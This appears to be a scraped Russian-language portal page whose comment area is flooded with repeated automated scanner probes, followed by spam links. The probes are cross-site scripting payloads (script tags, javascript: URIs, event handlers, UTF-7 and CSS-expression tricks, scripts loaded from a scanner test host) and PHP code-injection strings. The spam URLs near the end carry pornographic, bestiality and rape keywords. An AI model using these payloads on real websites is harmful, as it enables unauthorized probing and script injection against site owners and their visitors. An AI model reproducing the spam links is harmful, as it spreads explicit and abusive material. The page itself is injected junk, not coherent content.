1<script>alert(670079580650)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(670169580650);">

1< script>alert(670389581134);</script>

1<scrip<script>t>alert(670399581134);</scrip</script>t>

1<DIV STYLE="width:expression(alert(670409581134));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(670419581134);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(670429581134);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(670439581134);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="670449581134">

1<embed src="http://testphp.acunetix.com/xss.swf?670459581134" type="application/x-shockwave-flash"/>

1<body onload=alert(670469581134)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?670479581134></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?670699581788></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(670709581788)>

1' style='background:url(JaVaScRiPt:alert(670719581788))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?670739581788"></ScRiPt>

1" onmouseover=alert(670749581788)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(670769581788)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart671049582542'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(671079582542))>

1<iframe/ /onload=alert(671229583185)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(688949634460)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(689039634460);">

1< script>alert(689259635023);</script>

1<scrip<script>t>alert(689269635023);</scrip</script>t>

1<DIV STYLE="width:expression(alert(689279635023));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(689289635023);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(689299635023);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(689309635023);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="689319635023">

1<embed src="http://testphp.acunetix.com/xss.swf?689329635023" type="application/x-shockwave-flash"/>

1<body onload=alert(689339635023)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?689349635023></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?689569635522></script>

1' style='background:url(JaVaScRiPt:alert(689589635522))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?689609635522"></ScRiPt>

1</div><ScRiPt

1" onmouseover=alert(689619635522)

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(689639635522)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(689579635522)>

1ACUstart689839636275'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(689869636275))>

1<iframe/ /onload=alert(689929636602)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(707389683749)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(707479683749);">

1< script>alert(707699684519);</script>

1<scrip<script>t>alert(707709684520);</scrip</script>t>

1<DIV STYLE="width:expression(alert(707719684520));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(707729684520);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(707739684520);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(707749684520);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="707759684520">

1<embed src="http://testphp.acunetix.com/xss.swf?707769684520" type="application/x-shockwave-flash"/>

1<body onload=alert(707779684520)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?707789684520></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?708019685357></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(708029685357)>

1' style='background:url(JaVaScRiPt:alert(708039685357))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?708059685357"></ScRiPt>

1" onmouseover=alert(708069685357)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(708089685357)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart708369686308'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(708399686308))>

1<iframe/ /onload=alert(708569687333)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(740389752188)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1--><ScRiPt

1</title><ScRiPt

<img src="JaVaS&#99;RiPt:alert(740479752188);">

1<scrip<script>t>alert(740509752344);</scrip</script>t>

1< script>alert(740499752344);</script>

1<DIV STYLE="width:expression(alert(740519752344));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(740529752344);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(740539752344);">

1<body onload=alert(740579752344)>

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="740559752344">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(740549752344);">

1<embed src="http://testphp.acunetix.com/xss.swf?740569752344" type="application/x-shockwave-flash"/>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?740589752344></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?740609752500></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(740619752500)>

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?740649752500"></ScRiPt>

1" onmouseover=alert(740659752500)

1' style='background:url(JaVaScRiPt:alert(740629752500))' invalidparam='

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(740679752500)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart740779752715'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(740809752715))>

1<iframe/ /onload=alert(740849752865)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(755469773807)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(755559773807);">

1< script>alert(755579773917);</script>

1<DIV STYLE="width:expression(alert(755599773917));">

1<scrip<script>t>alert(755589773917);</scrip</script>t>

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(755629773917);">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(755609773917);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(755619773917);">

1<body onload=alert(755659773917)>

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="755639773917">

1<embed src="http://testphp.acunetix.com/xss.swf?755649773917" type="application/x-shockwave-flash"/>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?755669773918></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?755689774024></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(755699774024)>

1' style='background:url(JaVaScRiPt:alert(755709774024))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?755729774024"></ScRiPt>

1" onmouseover=alert(755739774024)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(755759774024)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart755839774124'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(755869774124))>

1<iframe/ /onload=alert(755909774236)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(770539792959)</script>

1</title><ScRiPt

1>'><ScRiPt

1</textarea><ScRiPt

1>"><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(770629792959);">

1<scrip<script>t>alert(770669793423);</scrip</script>t>

1< script>alert(770659793422);</script>

1<DIV STYLE="width:expression(alert(770679793423));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(770689793423);"></FRAMESET>

1<embed src="http://testphp.acunetix.com/xss.swf?770729793423" type="application/x-shockwave-flash"/>

1<img dynsrc="JaVaScRiPt:alert(770699793423);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="770719793423">

1<body onload=alert(770739793423)>

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(770709793423);">

1<ScRiPt src=http://testphp.acunetix.com/xss.js?770749793423></ScRiPt>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(770779793541)>

1<script/xss src=http://testphp.acunetix.com/xss.js?770769793541></script>

1' style='background:url(JaVaScRiPt:alert(770789793541))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?770809793541"></ScRiPt>

1" onmouseover=alert(770819793541)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(770839793541)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart770919793649'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(770949793649))>

1<iframe/ /onload=alert(770989793769)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\"

\'

1<script>alert(785629814074)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1--><ScRiPt

1</title><ScRiPt

<img src="JaVaS&#99;RiPt:alert(785719814074);">

1< script>alert(785749814247);</script>

1<scrip<script>t>alert(785759814247);</scrip</script>t>

1<DIV STYLE="width:expression(alert(785769814247));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(785779814247);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(785789814247);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="785809814247">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(785799814247);">

1<embed src="http://testphp.acunetix.com/xss.swf?785819814247" type="application/x-shockwave-flash"/>

1<body onload=alert(785829814247)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?785839814247></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?785869814423></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(785879814423)>

1' style='background:url(JaVaScRiPt:alert(785889814423))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?785909814423"></ScRiPt>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(785939814423)+ADsAPA-/ScRiPt+AD4-

1" onmouseover=alert(785919814423)

1</div><ScRiPt

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart786029814620'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(786059814620))>

1<iframe/ /onload=alert(786109814807)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(800709839619)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(800799839619);">

1< script>alert(800829839861);</script>

1<scrip<script>t>alert(800839839861);</scrip</script>t>

1<DIV STYLE="width:expression(alert(800849839861));">

1<img dynsrc="JaVaScRiPt:alert(800869839861);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="800889839862">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(800879839861);">

1<embed src="http://testphp.acunetix.com/xss.swf?800899839862" type="application/x-shockwave-flash"/>

1<body onload=alert(800909839862)>

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(800859839861);"></FRAMESET>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?800919839862></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?800949840141></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(800959840141)>

1' style='background:url(JaVaScRiPt:alert(800969840141))' invalidparam='

1" onmouseover=alert(800999840141)

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(801019840141)+ADsAPA-/ScRiPt+AD4-

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?800989840141"></ScRiPt>

1</div><ScRiPt

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart801119840599'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(801149840599))>

1<iframe/ /onload=alert(801189840867)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(815789876773)</script>

1>'><ScRiPt

1>"><ScRiPt

1</title><ScRiPt

1--><ScRiPt

1</textarea><ScRiPt

<img src="JaVaS&#99;RiPt:alert(815879876774);">

1< script>alert(815909877075);</script>

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(815939877075);"></FRAMESET>

1<DIV STYLE="width:expression(alert(815929877075));">

1<scrip<script>t>alert(815919877075);</scrip</script>t>

1<img dynsrc="JaVaScRiPt:alert(815949877075);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(815959877075);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="815969877075">

1<embed src="http://testphp.acunetix.com/xss.swf?815979877075" type="application/x-shockwave-flash"/>

1<body onload=alert(815989877075)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?815999877075></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?816029877383></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(816039877383)>

1' style='background:url(JaVaScRiPt:alert(816049877383))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?816069877383"></ScRiPt>

1" onmouseover=alert(816079877383)

1 '"><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(816099877383)+ADsAPA-/ScRiPt+AD4-

1</div><ScRiPt

1 "'><ScRiPt

</xss/*-*/style=xss:e/**/xpression(alert(816209877682))>

1ACUstart816179877682'";ACUend

1<iframe/ /onload=alert(816249877955)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(830859920912)</script>

1>"><ScRiPt

1>'><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(830949920912);">

1< script>alert(830969921046);</script>

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(830999921047);"></FRAMESET>

1<scrip<script>t>alert(830979921047);</scrip</script>t>

1<DIV STYLE="width:expression(alert(830989921047));">

1<img dynsrc="JaVaScRiPt:alert(831009921047);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="831029921047">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(831019921047);">

1<embed src="http://testphp.acunetix.com/xss.swf?831039921047" type="application/x-shockwave-flash"/>

1<body onload=alert(831049921047)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?831059921047></ScRiPt>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(831149921176)+ADsAPA-/ScRiPt+AD4-

1</div><ScRiPt

1 '"><ScRiPt

1 "'><ScRiPt

1<script/xss src=http://testphp.acunetix.com/xss.js?831079921176></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(831089921176)>

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?831119921176"></ScRiPt>

1' style='background:url(JaVaScRiPt:alert(831099921176))' invalidparam='

1" onmouseover=alert(831129921176)

1ACUstart831289921611'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(831319921611))>

1<iframe/ /onload=alert(831349921732)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(845949953827)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(846039953827);">

1< script>alert(846069954180);</script>

1<scrip<script>t>alert(846079954180);</scrip</script>t>

1<DIV STYLE="width:expression(alert(846089954180));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(846099954180);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(846109954180);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(846119954180);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="846129954180">

1<embed src="http://testphp.acunetix.com/xss.swf?846139954180" type="application/x-shockwave-flash"/>

1<body onload=alert(846149954180)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?846159954180></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?846179954495></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(846189954495)>

1' style='background:url(JaVaScRiPt:alert(846199954495))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?846219954495"></ScRiPt>

1" onmouseover=alert(846229954495)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(846249954495)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart846329954715'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(846359954715))>

1<iframe/ /onload=alert(846399954939)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(861019975299)</script>

1>'><ScRiPt

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(861109975300);">

1< script>alert(861159975633);</script>

1<scrip<script>t>alert(861169975633);</scrip</script>t>

1<DIV STYLE="width:expression(alert(861179975633));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(861189975633);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(861199975633);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(861209975633);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="861219975633">

1<embed src="http://testphp.acunetix.com/xss.swf?861229975634" type="application/x-shockwave-flash"/>

1<body onload=alert(861239975634)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?861249975634></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?861289975921></script>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(861299975921)>

1' style='background:url(JaVaScRiPt:alert(861309975921))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?861329975921"></ScRiPt>

1" onmouseover=alert(861339975921)

1</div><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(861359975921)+ADsAPA-/ScRiPt+AD4-

1 '"><ScRiPt

1 "'><ScRiPt

1ACUstart861449976136'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(861479976136))>

1<iframe/ /onload=alert(861509976336)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

";printf(md5(acunetix_wvs_security_test));exit;//

';printf(md5(acunetix_wvs_security_test));exit;//

'

acunetix'"

\'

\"

1<script>alert(876110002387)</script>

1>'><ScRiPt

1>"><ScRiPt

1</title><ScRiPt

1</textarea><ScRiPt

1--><ScRiPt

<img src="JaVaS&#99;RiPt:alert(876200002388);">

1< script>alert(876240002598);</script>

1<scrip<script>t>alert(876250002598);</scrip</script>t>

1<DIV STYLE="width:expression(alert(876260002599));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(876270002599);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(876280002599);">

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="876300002599">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(876290002599);">

1<embed src="http://testphp.acunetix.com/xss.swf?876310002599" type="application/x-shockwave-flash"/>

1<body onload=alert(876320002599)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?876330002599></ScRiPt>

1<script/xss src=http://testphp.acunetix.com/xss.js?876350002712></script>

1' style='background:url(JaVaScRiPt:alert(876370002712))' invalidparam='

1" onmouseover=alert(876400002713)

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(876360002712)>

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?876390002713"></ScRiPt>

1</div><ScRiPt

1 '"><ScRiPt

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(876420002713)+ADsAPA-/ScRiPt+AD4-

1 "'><ScRiPt

1ACUstart876500002829'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(876530002829))>

1<iframe/ /onload=alert(876570002970)></iframe>

'"

<meta http-equiv='Set-cookie' content='cookiename=cookievalue'>

\'\");|]*{

';printf(md5(acunetix_wvs_security_test));exit;//

";printf(md5(acunetix_wvs_security_test));exit;//

\'

\"

'

acunetix'"

1<script>alert(891190028709)</script>

1>"><ScRiPt

1</textarea><ScRiPt

1</title><ScRiPt

1--><ScRiPt

1>'><ScRiPt

<img src="JaVaS&#99;RiPt:alert(891280028709);">

1< script>alert(891300028894);</script>

1<scrip<script>t>alert(891310028894);</scrip</script>t>

1<DIV STYLE="width:expression(alert(891320028894));">

1<FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(891330028894);"></FRAMESET>

1<img dynsrc="JaVaScRiPt:alert(891340028894);">

1<META HTTP-EQUIV="refresh" CONTENT="0;url=JaVaS&#99;RiPt:alert(891350028894);">

1<embed src="http://testphp.acunetix.com/xss.swf?891370028895" type="application/x-shockwave-flash"/>

1<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" invalid="891360028895">

1<body onload=alert(891380028895)>

1<ScRiPt src=http://testphp.acunetix.com/xss.js?891390028895></ScRiPt>

1<img src=http://testphp.acunetix.com/dot.gif onload=alert(891430029074)>

1' style='background:url(JaVaScRiPt:alert(891440029074))' invalidparam='

1<ScRiPt bad=">" src="http://testphp.acunetix.com/xss.js?891460029074"></ScRiPt>

1</div><ScRiPt

1 '"><ScRiPt

1 "'><ScRiPt

1" onmouseover=alert(891470029074)

1<script/xss src=http://testphp.acunetix.com/xss.js?891420029074></script>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert(891490029074)+ADsAPA-/ScRiPt+AD4-

1ACUstart891610029650'";ACUend

</xss/*-*/style=xss:e/**/xpression(alert(891640029650))>

1<iframe/ /onload=alert(891670029823)></iframe>

http://mass.vh4.de/?thisbe="how-to-fuck-a-dog"-7

http://cadmirationforsooth.unterscheidet.de/?enoughprivate="the-passion-of-the-christ"-pictures-42

http://mgaitstillg.on.cm/?dumaidea="bible-black"-manga-video-download-free-24

http://jspeakerswing.moppelig.de/?nextalthough="sierra-reed"-pussy-41

http://lonraiseo.aufgetreten.de/?resourceconference="free-download-hentai-clip"-72

http://facttobacco.vorgekaut.de/?ministrymonth="melissa-singleton"-sex-tape-62

http://pindeedtwentyr.zx9.de/?marketcriticism="she-raped-her"-pussy-or-cunt-beg-18

http://gfurthernearlyr.ch.gp/?participateverse="one-man-and-a-jar"-85

http://levyingmean.5on.de/?traditionalpresent="trixi-love"-porn-34

http://hghltd.yandex.net/yandbtm?url=http%3A%2F%2Fwww.chp.com.ua%2Findex.php%3Fcode%3D6363%26show_all%3DYESS&text=GOOD'OK%20%EA%E0%EA%20%EE%F2%EA%EB%FE%F7%E8%F2%FC&qtree=XfWTsIlYOVrD%2FLGvIz3BkMJCJFtHgiMCIzq3cdQ%2BJDR29Sbd6CyE4ORkwuXJZYucAlUZLmJ5YfjzvPT9WeJJ3KT8f7jbh7ELM7Gkvo7H3bGqxtsc48otcWlmh066B2UYViAPgsdBBR2OFzy6MJlBZAcYc%2BcOUbrl3KhVxJ%2FysVk71s8vtgrJ%2FKWvtpRae0cQZFmkmJypAJrCPHBWhuutHyOKQgR3DZAdguELfrT8UGUZc0cjVl1oW7PohQwzMmXUzJ%2BM4x55dWWVk4DeFnEtWj9mvAAOSoFaYZXsclVT09oD3GF88N%2Fp6U8%2B00%2FrqFw3iSPvq708inmJhJ5vacVljwZ%2F7Xf51AqBcGhD79WnG460SeE09gOJOUGMF9%2BdBVnyYpaQ4pCT8Q1KfW71ybMC5Kadx2Ex6mjoDkPamdI4mh%2BgvKwUW0LKZuxAD5c%2BNgtqR%2BWOGqc7Kv0m3EBJMHJGDn6fQhqtEK3c7M29n2qqUtWx%2FXL1nqbdKbGeywTM7qNFVf5C1R4NKpC0R00Dg1ImRYggaYvO9xiv5XO5HZVuv5g%2F71HqJu9s34OncY3PErbi6AEw8iUwl%2F5A0eXC%2B83jcK9UP8wiSVbQMG3%2BPM0wQp1I41rr3VvWMFT7rr5cvI96rtlM1mmjEQId0SNU7JRs%2FrqBSWZ13sSME%2FqzRYhCUJiih05fozVPQqPcJhFc%2F4fb2FrKtyV8bvzfbi%2FUU5DWUIMmIMPpgsseN5P4ijk4Dz8%3D

http://iwreathingshowing.pro3.de/?showpart="kendra-nubiles"-femdom-55

<< предыдущая заметка следующая заметка >>
пожаловаться на эту публикацию администрации портала
архив понравившихся мне ссылок
Оставить комментарий